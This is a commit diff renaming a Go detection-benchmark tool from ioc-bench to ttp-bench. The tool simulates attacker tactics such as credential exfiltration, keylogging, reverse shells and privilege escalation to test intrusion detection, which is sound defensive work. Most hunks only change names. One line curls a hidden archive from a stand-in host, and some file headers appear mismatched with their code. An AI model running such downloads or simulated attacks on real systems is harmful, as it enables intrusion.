Rename to ttp-bench

Author: tstromberg

.gitignore

@@ -18,5 +18,5 @@
 out/
 
 # custom
-ioc-bench
+ttp-bench
 .DS_Store

README.md

@@ -1,8 +1,8 @@
-# ioc-bench
+# ttp-bench
 
 ![logo](./images/logo.png)
 
-ioc-bench simulates ~24 popular indicators of compromise (IoC) from both the [MITRE ATT&CK framework](https://attack.mitre.org/) and recently published defense research. All of the simulations behave at least vaguely suspicious, such as stealing GCP credentials, sniffing your keyboard, accessing unusual DNS servers, or pretending to be a kernel process.
+ttp-bench simulates 30 popular tactics from both the [MITRE ATT&CK framework](https://attack.mitre.org/) and published defense research. All of the simulations behave at least vaguely suspicious, such as stealing GCP credentials, sniffing your keyboard, accessing unusual DNS servers, or pretending to be a kernel process.
 
 How many of these simulations does your intrusion detection configuration detect?
 
@@ -15,18 +15,18 @@ How many of these simulations does your intrusion detection configuration detect
 
 * The Go Programming language
 
-Most of the checks available today mimic IoC found on UNIX-like operating systems. This is however not an intentional design goal. ioc-bench is actively tested on Linux, macOS, and FreeBSD.
+Most of the checks available today mimic IoC found on UNIX-like operating systems. This is however not an intentional design goal. ttp-bench is actively tested on Linux, macOS, and FreeBSD.
 
 ## Usage
 
 To jump in, run the following to access the interactive menu of checks to execute:
 
 ```shell
 go build .
-./ioc-bench
+./ttp-bench
 ```
 
-ioc-bench supports some flags for automation:
+ttp-bench supports some flags for automation:
 
 ```shell
  -all: execute all possible checks

cmd/access-chrome-breakout-root/main.go

@@ -6,7 +6,7 @@ import (
 	"os"
 	"path/filepath"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/cnc-dns-over-https/main.go

@@ -4,7 +4,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/cnc-resolve-random/main.go

@@ -4,7 +4,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/creds-gcp-exfil/main.go

@@ -4,7 +4,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/creds-keylogger-root/main.go

@@ -6,7 +6,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/evade-bash-history/main.go

@@ -6,7 +6,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/exec-bash-reverse-shell/main.go

@@ -6,7 +6,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/exec-curl-to-hidden-url/main.go

@@ -6,9 +6,9 @@ package main
 import (
 	"time"
 
-	"github.com/tstromberg/ioc-bench/pkg/iexec"
+	"github.com/tstromberg/ttp-bench/pkg/iexec"
 )
 
 func main() {
-	iexec.WithTimeout(30*time.Second, "curl", "-LO", "http://ioc-bench.blogspot.com/home/.tools/archive.tgz")
+	iexec.WithTimeout(30*time.Second, "curl", "-LO", "http://ttp-bench.blogspot.com/home/.tools/archive.tgz")
 }

cmd/exec-netcat-listen/main.go

@@ -7,7 +7,7 @@ import (
 	"log"
 	"time"
 
-	"github.com/tstromberg/ioc-bench/pkg/iexec"
+	"github.com/tstromberg/ttp-bench/pkg/iexec"
 )
 
 func main() {

cmd/exec-netcat-reverse-shell/main.go

@@ -7,7 +7,7 @@ import (
 	"log"
 	"time"
 
-	"github.com/tstromberg/ioc-bench/pkg/iexec"
+	"github.com/tstromberg/ttp-bench/pkg/iexec"
 )
 
 func main() {

cmd/exec-python-reverse-shell/main.go

@@ -6,7 +6,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/exec-traitor-vuln-probe/main.go

@@ -6,7 +6,7 @@ package main
 import (
 	"log"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

cmd/persist-user-crontab-reboot/main.go

@@ -12,7 +12,7 @@ import (
 	"time"
 
 	cp "github.com/otiai10/copy"
-	"github.com/tstromberg/ioc-bench/pkg/iexec"
+	"github.com/tstromberg/ttp-bench/pkg/iexec"
 )
 
 func main() {

cmd/privesc-traitor-dirty-pipe/main.go

@@ -11,7 +11,7 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 var KernelRe = regexp.MustCompile(`[0-9]+\.[0-9]+(\.[0-9]+)*`)

cmd/privesc-traitor-docker-socket/main.go

@@ -7,7 +7,7 @@ import (
 	"log"
 	"os/exec"
 
-	"github.com/tstromberg/ioc-bench/pkg/simulate"
+	"github.com/tstromberg/ttp-bench/pkg/simulate"
 )
 
 func main() {

go.mod

@@ -1,4 +1,4 @@
-module github.com/tstromberg/ioc-bench
+module github.com/tstromberg/ttp-bench
 
 go 1.17
 

images/logo.png

@@ -63,7 +63,7 @@ func ReplaceAndLaunch(src string, dest string, args string) error {
 
 	c := exec.Command("sh", "-c", dest, args)
 
-	// If we are root, swap to the user who ran ioc-bench
+	// If we are root, swap to the user who ran ttp-bench
 	if syscall.Geteuid() == 0 {
 		user := os.Getenv("DOAS_USER")
 		if user == "" {

pkg/simulate/breakout.go

@@ -5,7 +5,7 @@ import (
 	"os/exec"
 	"time"
 
-	"github.com/tstromberg/ioc-bench/pkg/iexec"
+	"github.com/tstromberg/ttp-bench/pkg/iexec"
 )
 
 func BashReverseShell() error {

pkg/simulate/reverse_shell.go

@@ -8,7 +8,7 @@ import (
 	"time"
 
 	"github.com/cavaliergopher/grab/v3"
-	"github.com/tstromberg/ioc-bench/pkg/iexec"
+	"github.com/tstromberg/ttp-bench/pkg/iexec"
 )
 
 func Traitor(args ...string) error {

pkg/simulate/traitor.go

@@ -111,7 +111,7 @@ func selectChoices(_ context.Context, choices []choice) ([]choice, error) {
 	}
 
 	l := list.New(items, list.NewDefaultDelegate(), 0, 0)
-	l.Title = "ioc-bench"
+	l.Title = "ttp-bench"
 
 	listKeys := newListKeyMap()
 	l.AdditionalShortHelpKeys = func() []key.Binding {